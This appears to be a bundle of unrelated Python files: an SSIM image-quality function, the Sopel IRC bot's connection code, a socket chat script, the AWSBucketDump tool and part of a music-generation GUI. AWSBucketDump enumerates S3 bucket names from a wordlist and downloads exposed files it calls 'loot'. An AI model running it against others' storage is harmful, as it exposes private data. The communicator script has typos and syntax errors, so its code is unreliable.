"""
2D gaussian mask - should give the same result as MATLAB's fspecial('gaussian',[shape],[sigma])
Acknowledgement : https://stackoverflow.com/questions/17190649/how-to-obtain-a-gaussian-filter-in-python (Author@ali_m)
"""
m,n = [(ss-1.)/2. for ss in shape]
y,x = np.ogrid[-m:m+1,-n:n+1]
h = np.exp( -(x*x + y*y) / (2.*sigma*sigma) )
h[ h < np.finfo(h.dtype).eps*h.max() ] = 0
sumh = h.sum()
if sumh != 0:
h /= sumh
return h
def calc_ssim(X, Y, scale, rgb_range, dataset=None, sigma=1.5, K1=0.01, K2=0.03, R=255):
'''
X : y channel (i.e., luminance) of transformed YCbCr space of X
Y : y channel (i.e., luminance) of transformed YCbCr space of Y
Please follow the setting of psnr_ssim.m in EDSR (Enhanced Deep Residual Networks for Single Image Super-Resolution CVPRW2017).
Official Link : https://github.com/LimBee/NTIRE2017/tree/db34606c2844e89317aac8728a2de562ef1f8aba
The authors of EDSR use MATLAB's ssim as the evaluation tool,
thus this function is the same as ssim.m in MATLAB with C(3) == C(2)/2.
'''
gaussian_filter = matlab_style_gauss2D((11, 11), sigma)
if dataset:
shave = scale
if X.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = X.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
X = X.mul(convert).sum(dim=1)
Y = Y.mul(convert).sum(dim=1)
else:
shave = scale + 6
X = X[..., shave:-shave, shave:-shave].squeeze().cpu().numpy().astype(np.float64)
Y = Y[..., shave:-shave, shave:-shave].squeeze().cpu().numpy().astype(np.float64)
window = gaussian_filter
ux = signal.convolve2d(X, window, mode='same', boundary='symm')
uy = signal.convolve2d(Y, window, mode='same', boundary='symm')
uxx = signal.convolve2d(X*X, window, mode='same', boundary='symm')
uyy = signal.convolve2d(Y*Y, window, mode='same', boundary='symm')
uxy = signal.convolve2d(X*Y, window, mode='same', boundary='symm')
vx = uxx - ux * ux
vy = uyy - uy * uy
vxy = uxy - ux * uy
C1 = (K1 * R) ** 2
C2 = (K2 * R) ** 2
A1, A2, B1, B2 = ((2 * ux * uy + C1, 2 * vxy + C2, ux ** 2 + uy ** 2 + C1, vx + vy + C2))
D = B1 * B2
S = (A1 * A2) / D
mssim = S.mean()
return mssim
|
irc.py
|
# coding=utf-8
"""
irc.py - A Utility IRC Bot
Copyright 2008, Sean B. Palmer, inamidst.com
Copyright 2012, Edward Powell, http://embolalia.net
Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
Licensed under the Eiffel Forum License 2.
Sopel: http://sopel.chat/
When working on core IRC protocol related features, consult protocol
documentation at http://www.irchelp.org/irchelp/rfc/
"""
import sys
import re
import time
import socket
import asyncore
import asynchat
import os
import codecs
import traceback
from tools import stderr, Nick
try:
import select
import ssl
has_ssl = True
except:
#no SSL support
has_ssl = False
import errno
import threading
from datetime import datetime
from tools import verify_ssl_cn
class Origin(object):
source = re.compile(r'([^!]*)!?([^@]*)@?(.*)')
def __init__(self, bot, source, args, tags):
self.hostmask = source
self.tags = tags
#Split out the nick, user, and host from hostmask per the regex above.
match = Origin.source.match(source or '')
self.nick, self.user, self.host = match.groups()
self.nick = Nick(self.nick)
# If we have more than one argument, the second one is the sender
if len(args) > 1:
target = args[1]
else:
target = None
# Unless we're messaging the bot directly, in which case that second
# arg will be our bot's name.
if target and target.lower() == bot.nick.lower():
target = self.nick
self.sender = target
class Bot(asynchat.async_chat):
def __init__(self, config):
if config.ca_certs is not None:
ca_certs = config.ca_certs
else:
ca_certs = '/etc/pki/tls/cert.pem'
if config.log_raw is None:
#Default is to log raw data, can be disabled in config
config.log_raw = True
asynchat.async_chat.__init__(self)
self.set_terminator('\n')
self.buffer = ''
self.nick = Nick(config.nick)
"""Sopel's current ``Nick``. Changing this while Sopel is running is
untested."""
self.user = config.user
"""Sopel's user/ident."""
self.name = config.name
"""Sopel's "real name", as used for whois."""
self.channels = []
"""The list of channels Sopel is currently in."""
self.stack = []
self.ca_certs = ca_certs
self.hasquit = False
self.sending = threading.RLock()
self.writing_lock = threading.Lock()
self.raw = None
#Right now, only accounting for two op levels.
#This might be expanded later.
#These lists are filled in startup.py, as of right now.
self.ops = dict()
"""
A dictionary mapping channels to a ``Nick`` list of their operators.
"""
self.halfplus = dict()
"""
A dictionary mapping channels to a ``Nick`` list of their half-ops and
ops.
"""
self.voices = dict()
"""
A dictionary mapping channels to a ``Nick`` list of their voices,
half-ops and ops.
"""
#We need this to prevent error loops in handle_error
self.error_count = 0
self.connection_registered = False
""" Set to True when a server has accepted the client connection and
messages can be sent and received. """
def log_raw(self, line, prefix):
''' Log raw line to the raw log '''
if not self.config.core.log_raw:
return
if not self.config.core.logdir:
self.config.core.logdir = os.path.join(self.config.dotdir,
'logs')
if not os.path.isdir(self.config.core.logdir):
try:
os.mkdir(self.config.core.logdir)
except Exception, e:
stderr('There was a problem creating the logs directory.')
stderr('%s %s' % (str(e.__class__), str(e)))
stderr('Please fix this and then run Sopel again.')
os._exit(1)
f = codecs.open(os.path.join(self.config.core.logdir, 'raw.log'),
'a', encoding='utf-8')
f.write(prefix + unicode(time.time()) + "\t")
temp = line.replace('\n', '')
f.write(temp)
f.write("\n")
f.close()
def safe(self, string):
'''Remove newlines from a string'''
string = string.replace('\n', '')
string = string.replace('\r', '')
if not isinstance(string, unicode):
string = unicode(string, encoding='utf8')
return string
def write(self, args, text=None):
"""Send a command to the server
``args`` is an iterable of strings, which are joined by spaces.
``text`` is treated as though it were the final item in ``args``, but
is preceeded by a ``:``. This is a special case which means that
``text``, unlike the items in ``args`` may contain spaces (though this
constraint is not checked by ``write``).
In other words, both ``sopel.write(('PRIVMSG',), 'Hello, world!')``
and ``sopel.write(('PRIVMSG', ':Hello, world!'))`` will send
``PRIVMSG :Hello, world!`` to the server.
Newlines and carriage returns ('\\n' and '\\r') are removed before
sending. Additionally, if the message (after joining) is longer than
than 510 characters, any remaining characters will not be sent.
"""
args = [self.safe(arg) for arg in args]
if text is not None:
text = self.safe(text)
try:
self.writing_lock.acquire() # Blocking lock, can't send two things
# at a time
#From RFC2812 Internet Relay Chat: Client Protocol
#Section 2.3
#
#https://tools.ietf.org/html/rfc2812.html
#
#IRC messages are always lines of characters terminated with a
#CR-LF (Carriage Return - Line Feed) pair, and these messages SHALL
#NOT exceed 512 characters in length, counting all characters
#including the trailing CR-LF. Thus, there are 510 characters
#maximum allowed for the command and its parameters. There is no
#provision for continuation of message lines.
if text is not None:
temp = (u' '.join(args) + ' :' + text)[:510] + '\r\n'
else:
temp = u' '.join(args)[:510] + '\r\n'
self.log_raw(temp, '>>')
self.send(temp.encode('utf-8'))
finally:
self.writing_lock.release()
def run(self, host, port=6667):
try:
self.initiate_connect(host, port)
except socket.error, e:
stderr('Connection error: %s' % e.strerror)
self.hasquit = True
def initiate_connect(self, host, port):
stderr('Connecting to %s:%s...' % (host, port))
source_address = ((self.config.core.bind_host, 0)
if self.config.core.bind_address else None)
self.set_socket(socket.create_connection((host, port),
source_address=source_address))
if self.config.core.use_ssl and has_ssl:
self.send = self._ssl_send
self.recv = self._ssl_recv
elif not has_ssl and self.config.core.use_ssl:
stderr('SSL is not avilable on your system, attempting connection '
'without it')
self.connect((host, port))
try:
asyncore.loop()
except KeyboardInterrupt:
print 'KeyboardInterrupt'
self.quit('KeyboardInterrupt')
def quit(self, message):
'''Disconnect from IRC and close the bot'''
self.write(['QUIT'], message)
self.hasquit = True
# Wait for acknowledgement from the server. By RFC 2812 it should be
# an ERROR msg, but many servers just close the connection. Either way
# is fine by us.
# Closing the connection now would mean that stuff in the buffers that
# has not yet been processed would never be processed. It would also
# release the main thread, which is problematic because whomever called
# quit might still want to do something before main thread quits.
def handle_close(self):
self.connection_registered = False
self._shutdown()
stderr('Closed!')
# This will eventually call asyncore dispatchers close method, which
# will release the main thread. This should be called last to avoid
# race conditions.
asynchat.async_chat.handle_close(self)
def part(self, channel, msg=None):
'''Part a channel'''
self.write(['PART', channel], msg)
def join(self, channel, password=None):
'''Join a channel
If `channel` contains a space, and no `password` is given, the space is
assumed to split the argument into the channel to join and its password.
`channel` should not contain a space if `password` is given.'''
if password is None:
self.write(('JOIN', channel))
else:
self.write(['JOIN', channel, password])
def handle_connect(self):
if self.config.core.use_ssl and has_ssl:
if not self.config.core.verify_ssl:
self.ssl = ssl.wrap_socket(self.socket,
do_handshake_on_connect=False,
suppress_ragged_eofs=True)
else:
verification = verify_ssl_cn(self.config.host,
int(self.config.port))
if verification is 'NoCertFound':
stderr('Can\'t get server certificate, SSL might be '
'disabled on the server.')
os.unlink(self.config.pid_file_path)
os._exit(1)
elif verification is not None:
stderr('\nSSL Cert information: %s' % verification[1])
if verification[0] is False:
stderr("Invalid certficate, CN mismatch!")
os.unlink(self.config.pid_file_path)
os._exit(1)
else:
stderr('WARNING! certficate information and CN validation '
'are not avilable. Is pyOpenSSL installed?')
stderr('Trying to connect anyway:')
self.ssl = ssl.wrap_socket(self.socket,
do_handshake_on_connect=False,
suppress_ragged_eofs=True,
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=self.ca_certs)
stderr('\nSSL Handshake intiated...')
error_count = 0
while True:
try:
self.ssl.do_handshake()
break
except ssl.SSLError, err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([self.ssl], [], [])
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [self.ssl], [])
elif err.args[0] == 1:
stderr('SSL Handshake failed with error: %s' %
err.args[1])
os._exit(1)
else:
error_count = error_count + 1
if error_count > 5:
stderr('SSL Handshake failed (%d failed attempts)'
% error_count)
os._exit(1)
raise
except Exception as e:
print >> sys.stderr, ('SSL Handshake failed with error: %s'
% e)
os._exit(1)
self.set_socket(self.ssl)
# Request list of server capabilities. IRCv3 servers will respond with
# CAP * LS (which we handle in coretasks). v2 servers will respond with
# 421 Unknown command, which we'll ignore
self.write(('CAP', 'LS'))
if self.config.core.server_password is not None:
self.write(('PASS', self.config.core.server_password))
self.write(('NICK', self.nick))
self.write(('USER', self.user, '+iw', self.nick), self.name)
stderr('Connected.')
self.last_ping_time = datetime.now()
timeout_check_thread = threading.Thread(target=self._timeout_check)
timeout_check_thread.start()
ping_thread = threading.Thread(target=self._send_ping)
ping_thread.start()
def _timeout_check(self):
while True:
if (
datetime.now() - self.last_ping_time
).seconds > int(self.config.timeout):
stderr(
'Ping timeout reached after %s seconds,' +
' closing connection' %
self.config.timeout
)
self.handle_close()
break
else:
time.sleep(int(self.config.timeout))
def _send_ping(self):
while True:
if (
datetime.now() - self.last_ping_time
).seconds > int(self.config.timeout) / 2:
self.write(('PING', self.config.host))
time.sleep(int(self.config.timeout) / 2)
def _ssl_send(self, data):
""" Replacement for self.send() during SSL connections. """
try:
result = self.socket.send(data)
return result
except ssl.SSLError, why:
if why[0] in (asyncore.EWOULDBLOCK, errno.ESRCH):
return 0
else:
raise ssl.SSLError, why
return 0
def _ssl_recv(self, buffer_size):
""" Replacement for self.recv() during SSL connections. From:
http://evanfosmark.com/2010/09/ssl-support-in-asynchatasync_chat """
try:
data = self.socket.read(buffer_size)
if not data:
self.handle_close()
return ''
return data
except ssl.SSLError, why:
if why[0] in (asyncore.ECONNRESET, asyncore.ENOTCONN,
asyncore.ESHUTDOWN):
self.handle_close()
return ''
elif why[0] == errno.ENOENT:
# Required in order to keep it non-blocking
return ''
else:
raise
def collect_incoming_data(self, data):
# We can't trust clients to pass valid unicode.
try:
data = unicode(data, encoding='utf-8')
except UnicodeDecodeError:
# not unicode, let's try cp1252
try:
data = unicode(data, encoding='cp1252')
except UnicodeDecodeError:
# Okay, let's try ISO8859-1
try:
data = unicode(data, encoding='iso8859-1')
except:
# Discard line if encoding is unknown
return
if data:
self.log_raw(data, '<<')
self.buffer += data
def found_terminator(self):
line = self.buffer
if line.endswith('\r'):
line = line[:-1]
self.buffer = u''
self.raw = line
# Break off IRCv3 message tags, if present
tags = {}
if line.startswith('@'):
tagstring, line = line.split(' ', 1)
for tag in tagstring[1:].split(';'):
tag = tag.split('=', 1)
if len(tag) > 1:
tags[tag[0]] = tag[1]
else:
tags[tag[0]] = None
if line.startswith(':'):
source, line = line[1:].split(' ', 1)
else:
source = None
if ' :' in line:
argstr, text = line.split(' :', 1)
args = argstr.split()
args.append(text)
else:
args = line.split()
text = args[-1]
self.last_ping_time = datetime.now()
if args[0] == 'PING':
self.write(('PONG', text))
elif args[0] == 'ERROR':
self.debug(__file__, text, 'always')
if self.hasquit:
self.close_when_done()
elif args[0] == '433':
stderr('Nickname already in use!')
self.handle_close()
origin = Origin(self, source, args, tags)
self.dispatch(origin, text, args)
def dispatch(self, origin, text, args):
pass
def msg(self, recipient, text, max_messages=1):
# We're arbitrarily saying that the max is 400 bytes of text when
# messages will be split. Otherwise, we'd have to acocunt for the bot's
# hostmask, which is hard.
max_text_length = 400
encoded_text = text.encode('utf-8')
excess = ''
if max_messages > 1 and len(encoded_text) > max_text_length:
last_space = encoded_text.rfind(' ', 0, max_text_length)
if last_space == -1:
excess = encoded_text[max_text_length:]
encoded_text = encoded_text[:max_text_length]
else:
excess = encoded_text[last_space + 1:]
encoded_text = encoded_text[:last_space]
# Back to unicode again, so we don't screw things up later.
text = encoded_text.decode('utf-8')
# We'll then send the excess at the end
try:
self.sending.acquire()
# No messages within the last 3 seconds? Go ahead!
# Otherwise, wait so it's been at least 0.8 seconds + penalty
if self.stack:
elapsed = time.time() - self.stack[-1][0]
if elapsed < 3:
penalty = float(max(0, len(text) - 50)) / 70
wait = 0.8 + penalty
if elapsed < wait:
time.sleep(wait - elapsed)
# Loop detection
messages = [m[1] for m in self.stack[-8:]]
if messages.count(text) >= 5:
text = '...'
if messages.count('...') >= 3:
return
self.write(('PRIVMSG', recipient), text)
self.stack.append((time.time(), self.safe(text)))
self.stack = self.stack[-10:]
finally:
self.sending.release()
# Now that we've sent the first part, we need to send the rest. Doing
# this recursively seems easier to me than iteratively
if excess:
self.msg(recipient, excess, max_messages - 1)
def notice(self, dest, text):
'''Send an IRC NOTICE to a user or a channel. See IRC protocol
documentation for more information'''
self.write(('NOTICE', dest), text)
def error(self, origin=None, trigger=None):
''' Called internally when a module causes an error '''
try:
trace = traceback.format_exc()
trace = trace.decode('utf-8', errors='xmlcharrefreplace')
stderr(trace)
try:
lines = list(reversed(trace.splitlines()))
report = [lines[0].strip()]
for line in lines:
line = line.strip()
if line.startswith('File "/'):
report.append(line[0].lower() + line[1:])
break
else:
report.append('source unknown')
signature = '%s (%s)' % (report[0], report[1])
# TODO: make not hardcoded
log_filename = os.path.join(
self.config.logdir, 'exceptions.log'
)
with codecs.open(
log_filename, 'a', encoding='utf-8'
) as logfile:
logfile.write(u'Signature: %s\n' % signature)
if origin:
logfile.write(
u'from %s at %s:\n' % (
origin.sender, str(datetime.now())
)
)
if trigger:
logfile.write(
u'Message was: <%s> %s\n' % (
trigger.nick, trigger.group(0)
)
)
logfile.write(trace)
logfile.write(
'----------------------------------------\n\n'
)
except Exception as e:
stderr("Could not save full traceback!")
self.debug(__file__, "(From: " + origin.sender +
"), can't save traceback: " + str(e), 'always')
if origin:
self.msg(origin.sender, signature)
except Exception as e:
if origin:
self.msg(origin.sender, "Got an error.")
self.debug(
__file__,
"(From: " + origin.sender + ") " + str(e),
'always'
)
def handle_error(self):
''' Handle any uncaptured error in the core. Overrides asyncore's
handle_error '''
trace = traceback.format_exc()
stderr(trace)
self.debug(
__file__,
'Fatal error in core, please review exception log',
'always'
)
# TODO: make not hardcoded
logfile = codecs.open(
os.path.join(self.config.logdir, 'exceptions.log'),
'a',
encoding='utf-8'
)
logfile.write('Fatal error in core, handle_error() was called\n')
logfile.write('last raw line was %s' % self.raw)
logfile.write(trace)
logfile.write('Buffer:\n')
logfile.write(self.buffer)
logfile.write('----------------------------------------\n\n')
logfile.close()
if self.error_count > 10:
if (datetime.now() - self.last_error_timestamp).seconds < 5:
print >> sys.stderr, "Too many errors, can't continue"
os._exit(1)
self.last_error_timestamp = datetime.now()
self.error_count = self.error_count + 1
if self.config.exit_on_error:
os._exit(1)
#Helper functions to maintain the oper list.
#They cast to Nick when adding to be quite sure there aren't any accidental
#string nicks. On deletion, you know you'll never need to worry about what
#the real superclass is, so we just cast and remove.
def add_op(self, channel, name):
if isinstance(name, Nick):
self.ops[channel].add(name)
else:
self.ops[channel].add(Nick(name))
def add_halfop(self, channel, name):
if isinstance(name, Nick):
self.halfplus[channel].add(name)
else:
self.halfplus[channel].add(Nick(name))
def add_voice(self, channel, name):
if isinstance(name, Nick):
self.voices[channel].add(name)
else:
self.voices[channel].add(Nick(name))
def del_op(self, channel, name):
self.ops[channel].discard(Nick(name))
def del_halfop(self, channel, name):
self.halfplus[channel].discard(Nick(name))
def del_voice(self, channel, name):
self.voices[channel].discard(Nick(name))
def flush_ops(self, channel):
self.ops[channel] = set()
self.halfplus[channel] = set()
self.voices[channel] = set()
def init_ops_list(self, channel):
if not channel in self.halfplus:
self.halfplus[channel] = set()
if not channel in self.ops:
self.ops[channel] = set()
if not channel in self.voices:
self.voices[channel] = set()
if __name__ == "__main__":
print __doc__
|
client communicator.py
|
import socket,time
from threading import Thread
from socket import *
servers=[]
clients=[]
s=socket(AF_INET,SOCK_STREAM)
host="0.0.0.0"
port=10000
s.bind((host,port))
s2=socket(AF_INET,SOCK_STREAM)
address=socket.gethostbyname(socket.getfqdn())
s2.connect((address,10500))
def main_send(msg):
s2.send(bytes(str(msg),'utf-8'))
def main_recive():
data2=s2.recv(1024)
data2=data2.decode('utf-8')
return data2
lol=main_recive()
if lol=="type?":
main_send("Client Communicator")
else:
print("did not get type? command form main server shutting down...")
time.sleep(3)
exit()
def send(c,msg):
c.send(bytes(str(msg),'uft-8'))
def recive(c,a):
data=c.recv(1024)
data=data.decode('utf-8')
return data
def handler(c,a):
send(c,str(servers).replace("[","").replace("]","").replace(",","\n"))
while True:
data=recive(c,a)
if data[0:1]=="$":
data2=data[1:]
if "connect "in data2[0:8]:
pass
elif data2=="list_servers":
send(c,str(srvers).replace("[","").replace("]","").replace(",","\n"))
elif data2=="man_update":
main_send("Comm: send serverslist")
serv_list=main_recive()
serv_list=str(serv_list).split(",")
send(c,str(serv_list).replace("[","").replace("]","").replace(",","\n"))
elif data2=="help":
print("""help-list commands
connect -connects you to a server EX:connect server0,me (you don't type this part in but the reason it allows you to do that is to drag people into the same server as you if you know their ip address)
list_server-list servers that it alredy has listed
man_update-manually updates it for your eyes only it does not update the server list for everyone and will list it to you
exit-exits you from the communicator SAFELY AND IT'S RECOMMANDED TO DO THIS""")
elif data2=="exit":
send(c,"thank you for useing the communicator even if you did not get in to a server probably goob-bye!")
send(c,"you are safe to close the program")
c.close()
def server_checker(c,a):
while True:
servers.clear()
main_send("Comm: send serverslist")
serv_list=main_recive()
serv_list=str(serv_list).split(",")
server=0
for serv in serv_list:
server+=1
servers.append(serv)
time.sleep(1200)
for client in clients:
send(client,"theres an updated version of the servers list would you would need to type $list_servers you got to wait 10 secs beofere manually update the servers list")
while True:
c,a=s.acccept()
clients.append(c)
sc=Thread(target=server_checker,args=(c,a)
sc.start()
handler(c,a)
|
AWSBucketDump.py
|
#!/usr/bin/env python
# AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot.
# It's similar to a subdomain bruteforcer but is made specifically to S3
# buckets and also has some extra features that allow you to grep for
# delicous files as well as download interesting files if you're not
# afraid to quickly fill up your hard drive.
# by Jordan Potti
# @ok_bye_now
from argparse import ArgumentParser
import codecs
import requests
import xmltodict
import sys
import os
import shutil
import traceback
from queue import Queue
from threading import Thread, Lock
bucket_q = Queue()
download_q = Queue()
grep_list = None
arguments = None
def fetch(url):
print('Fetching ' + url + '...')
response = requests.get(url)
if response.status_code == 403:
status403(url)
elif response.status_code == 404:
status404(url)
elif response.status_code == 200:
if "Content" in response.text:
returnedList=status200(response,grep_list,url)
def bucket_worker():
while True:
item = bucket_q.get()
try:
fetch(item)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
bucket_q.task_done()
def downloadWorker():
print('Download worker running...')
while True:
item = download_q.get()
try:
downloadFile(item)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
download_q.task_done()
directory_lock = Lock()
def get_directory_lock():
directory_lock.acquire()
def release_directory_lock():
directory_lock.release()
def get_make_directory_return_filename_path(url):
global arguments
bits = url.split('/')
directory = arguments.savedir
for i in range(2,len(bits)-1):
directory = os.path.join(directory, bits[i])
try:
get_directory_lock()
if not os.path.isdir(directory):
os.makedirs(directory)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
finally:
release_directory_lock()
return os.path.join(directory, bits[-1]).rstrip()
interesting_file_lock = Lock()
def get_interesting_file_lock():
interesting_file_lock.acquire()
def release_interesting_file_lock():
interesting_file_lock.release()
def write_interesting_file(filepath):
try:
get_interesting_file_lock()
with open('interesting_file.txt', 'ab+') as interesting_file:
interesting_file.write(filepath.encode('utf-8'))
interesting_file.write('\n'.encode('utf-8'))
finally:
release_interesting_file_lock()
def downloadFile(filename):
global arguments
print('Downloading {}'.format(filename) + '...')
local_path = get_make_directory_return_filename_path(filename)
local_filename = (filename.split('/')[-1]).rstrip()
print('local {}'.format(local_path))
if local_filename =="":
print("Directory..\n")
else:
r = requests.get(filename.rstrip(), stream=True)
if 'Content-Length' in r.headers:
if int(r.headers['Content-Length']) > arguments.maxsize:
print("This file is greater than the specified max size... skipping...\n")
else:
with open(local_path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
r.close()
def print_banner():
print('''\nDescription:
AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot.
It's similar to a subdomain bruteforcer but is made specifically to S3
buckets and also has some extra features that allow you to grep for
delicous files as well as download interesting files if you're not
afraid to quickly fill up your hard drive.
by Jordan Potti
@ok_bye_now'''
)
def cleanUp():
print("Cleaning up files...")
def status404(line):
# print(line.rstrip() + " NoSuchBucket.")
pass
def status403(line):
print(line.rstrip() + " Exists but AccessDenied.")
def queue_up_download(filepath):
download_q.put(filepath)
print('Collectable: {}'.format(filepath))
write_interesting_file(filepath)
def status200(response,grep_list,line):
print("Pilfering "+line.rstrip() + '...')
objects=xmltodict.parse(response.text)
Keys = []
interest=[]
try:
for child in objects['ListBucketResult']['Contents']:
Keys.append(child['Key'])
except:
pass
hit = False
for words in Keys:
words = (str(words)).rstrip()
collectable = line+'/'+words
if grep_list != None and len(grep_list) > 0:
for grep_line in grep_list:
grep_line = (str(grep_line)).rstrip()
if grep_line in words:
queue_up_download(collectable)
break
else:
queue_up_download(collectable)
def main():
global arguments
global grep_list
parser = ArgumentParser()
parser.add_argument("-D", dest="download", required=False, action="store_true", default=False, help="Download files. This requires significant disk space.")
parser.add_argument("-d", dest="savedir", required=False, default='', help="If -D, then -d 1 to create save directories for each bucket with results.")
parser.add_argument("-l", dest="hostlist", required=True, help="")
parser.add_argument("-g", dest="grepwords", required=False, help="Provide a wordlist to grep for.")
parser.add_argument("-m", dest="maxsize", type=int, required=False, default=1024, help="Maximum file size to download.")
parser.add_argument("-t", dest="threads", type=int, required=False, default=1, help="Number of threads.")
if len(sys.argv) == 1:
print_banner()
parser.error("No arguments given.")
parser.print_usage
sys.exit()
# output parsed arguments into a usable object
arguments = parser.parse_args()
# specify primary variables
with open(arguments.grepwords, "r") as grep_file:
grep_content = grep_file.readlines()
grep_list = [ g.strip() for g in grep_content ]
if arguments.download and arguments.savedir:
print("Downloads enabled (-D), save directories (-d) for each host will be created/used.")
elif arguments.download and not arguments.savedir:
print("Downloads enabled (-D), will be saved to current directory.")
else:
print("Downloads were not enabled (-D), not saving results locally.")
# start up bucket workers
for i in range(0,arguments.threads):
print('Starting thread...')
t = Thread(target=bucket_worker)
t.daemon = True
t.start()
# start download workers
for i in range(1, arguments.threads):
t = Thread(target=downloadWorker)
t.daemon = True
t.start()
with open(arguments.hostlist) as f:
for line in f:
bucket = 'http://'+line.rstrip()+'.s3.amazonaws.com'
print('Queuing {}'.format(bucket) + '...')
bucket_q.put(bucket)
bucket = 'http://'+line.rstrip()+'.s3-accelerate.amazonaws.com'
print('Queuing {}'.format(bucket) + '...')
bucket_q.put(bucket)
bucket_q.join()
if arguments.download:
download_q.join()
cleanUp()
if __name__ == "__main__":
main()
|
music_gen_gui.py
|
#!/usr/bin/env python
import pygame
from music_generation import *
from sound_generation import *
from constants import *
from helpers import *
import math
import random as rd
import time
import threading
import sys
import random
class MusGUI(object):
def __init__(self):
pygame.mixer.pre_init(44100, 16, 1, 4096)
pygame.init()
pygame.font.init()
self.screen_commit = pygame.display.set_mode(WINDOW_SIZE)
self.screen = pygame.Surface(FRAME_SIZE)
pygame.display.set_caption("Pytchie - Random Music Synthesis")
self.print_font = pygame.font.Font(fp("Myriad.otf"), int(16 * SCALE_X))
self.most_recent_print = ""
self.print_text = self.most_recent_print
self.most_recent_print_time = ""
self.title_font = pygame.font.Font(fp("Myriad.otf"), int(22 * SCALE_X))
texts = ["LEAD", "BASS", "COMP", "PERC", "MIX"]
self.titles = [self.title_font.render(text, 1, (200, 200, 200)) for text in texts]
link_font = pygame.font.Font(fp("Myriad.otf"), int(16 * SCALE_X))
self.link = link_font.render("github.com/jeremycryan/pytchie", 1, (120, 120, 120))
self.spinner_sprite = SpinnerSprite(self.screen_commit)
self.last_spinner_draw = time.time()
self.loading = False
self.threads = []
self.main()
def gui_print(self):
text = "%s: %s" % (str(self.most_recent_print_time), self.print_text.upper())
a = self.print_font.render(text, 1, (180, 180, 180))
self.screen.blit(a, (int(20 * SCALE_X), int(FRAME_HEIGHT * 0.95)))
def gui_print_text(self, text):
self.print_text = text
self.most_recent_print_time = int(time.time() % 1000 * 100) / 100.0
def draw_titles(self):
self.screen.blit(self.titles[0], (int(0.08 * FRAME_WIDTH), int((LEAD_Y) * FRAME_HEIGHT)))
self.screen.blit(self.titles[4], (int(0.08 * FRAME_WIDTH), int(MIX_Y * FRAME_HEIGHT)))
self.screen.blit(self.titles[1], (int(0.08 * FRAME_WIDTH), int(BASS_Y * FRAME_HEIGHT)))
self.screen.blit(self.titles[3], (int(0.08 * FRAME_WIDTH), int(SNARE_Y * FRAME_HEIGHT)))
self.screen.blit(self.titles[2], (int(0.08 * FRAME_WIDTH), int(COMP_Y * FRAME_HEIGHT)))
self.screen.blit(self.link,
(int(0.63 * FRAME_WIDTH),
int(0.85 * FRAME_HEIGHT)))
def main(self):
then = time.time()
self.click = False
generate = Button(pos=(0.83, 0.925), text="GENERATE")
randomize = Button(pos=(0.66, MIX_Y + MIX_SPACING_Y / 2), text="RANDOMIZE")
tempo = Gauge(pos=(0.2, MIX_Y), label="TEMPO", min_val=60, max_val=180, starting_val=120, size=(0.383, 0.05))
chord_1 = ModeButton(size=(0.11, 0.05), pos=(0.2 + 0 * MIX_SPACING_X, MIX_Y + MIX_SPACING_Y),
texts=["I", "ii", "iii", "IV", "V", "vi", "vii", "RAND"], start_mode=5)
chord_2 = ModeButton(size=(0.11, 0.05), pos=(0.2 + 1 * MIX_SPACING_X, MIX_Y + MIX_SPACING_Y),
texts=["I", "ii", "iii", "IV", "V", "vi", "vii", "RAND"], start_mode=3)
chord_3 = ModeButton(size=(0.11, 0.05), pos=(0.2 + 2 * MIX_SPACING_X, MIX_Y + MIX_SPACING_Y),
texts=["I", "ii", "iii", "IV", "V", "vi", "vii", "RAND"], start_mode=0)
chord_4 = ModeButton(size=(0.11, 0.05), pos=(0.2 + 3 * MIX_SPACING_X, MIX_Y + MIX_SPACING_Y),
texts=["I", "ii", "iii", "IV", "V", "vi", "vii", "RAND"], start_mode=4)
lead_instrument_button = ModeButton(pos=(0.2, LEAD_Y + LEAD_SPACING),
texts=["RANDOM", "FLUTE", "TRUMPET", "VIOLIN", "SNARE"])
lead_enable = ToggleButton(pos=(0.2, LEAD_Y))
lead_intricacy = Gauge(pos=(0.38, LEAD_Y), size=(0.5, 0.05), bar_color=BLUE, label="INTRICACY",
starting_val=0.7)
lead_temerity = Gauge(pos=(0.38, LEAD_Y + LEAD_SPACING), size=(0.5, 0.05), bar_color=BLUE, label="TEMERITY",
starting_val=0.7)
bass_enable = ToggleButton(pos=(0.2, BASS_Y))
bass_instrument_button = ModeButton(pos=(0.2, BASS_Y + LEAD_SPACING), texts=["RANDOM", "SAWTOOTH", "SQUARE"])
bass_intricacy = Gauge(pos=(0.38, BASS_Y), size=(0.5, 0.05), bar_color=BLUE, label="INTRICACY",
starting_val=0.3)
bass_temerity = Gauge(pos=(0.38, BASS_Y + BASS_SPACING), size=(0.5, 0.05), bar_color=BLUE, label="TEMERITY",
starting_val=0.3)
snare_enable = ToggleButton(pos=(0.2, SNARE_Y))
snare_intricacy = Gauge(pos=(0.38, SNARE_Y), size=(0.5, 0.05), bar_color=BLUE, label="INTRICACY",
starting_val=0.5)
comp_enable = ToggleButton(pos=(0.2, COMP_Y))
comp_instrument_button = ModeButton(pos=(0.38, COMP_Y), texts=["RANDOM", "FLUTE", "TRUMPET", "VIOLIN"])
self.buttons = [generate, randomize, lead_enable, lead_instrument_button,
bass_instrument_button, bass_enable, chord_1, chord_2, chord_3, chord_4,
snare_enable, comp_enable, comp_instrument_button]
self.gauges = [lead_intricacy, lead_temerity, tempo, bass_intricacy, bass_temerity,
snare_intricacy]
self.clicked = []
self.bleeps = []
while True:
now = time.time()
dt = now - then
then = now
chords = [chord.texts[chord.mode] for chord in [chord_1, chord_2, chord_3, chord_4]]
to_generate = False
if generate in self.clicked:
a = Song(4, tempo.value,
lead_intricacy=lead_intricacy.value,
lead_temerity=lead_temerity.value,
bass_intricacy=bass_intricacy.value,
bass_temerity=bass_temerity.value,
chords=chords,
snare_intricacy=snare_intricacy.value)
self.gui_print_text("Generating a sample song with your parameters...")
to_generate = 1
if randomize in self.clicked:
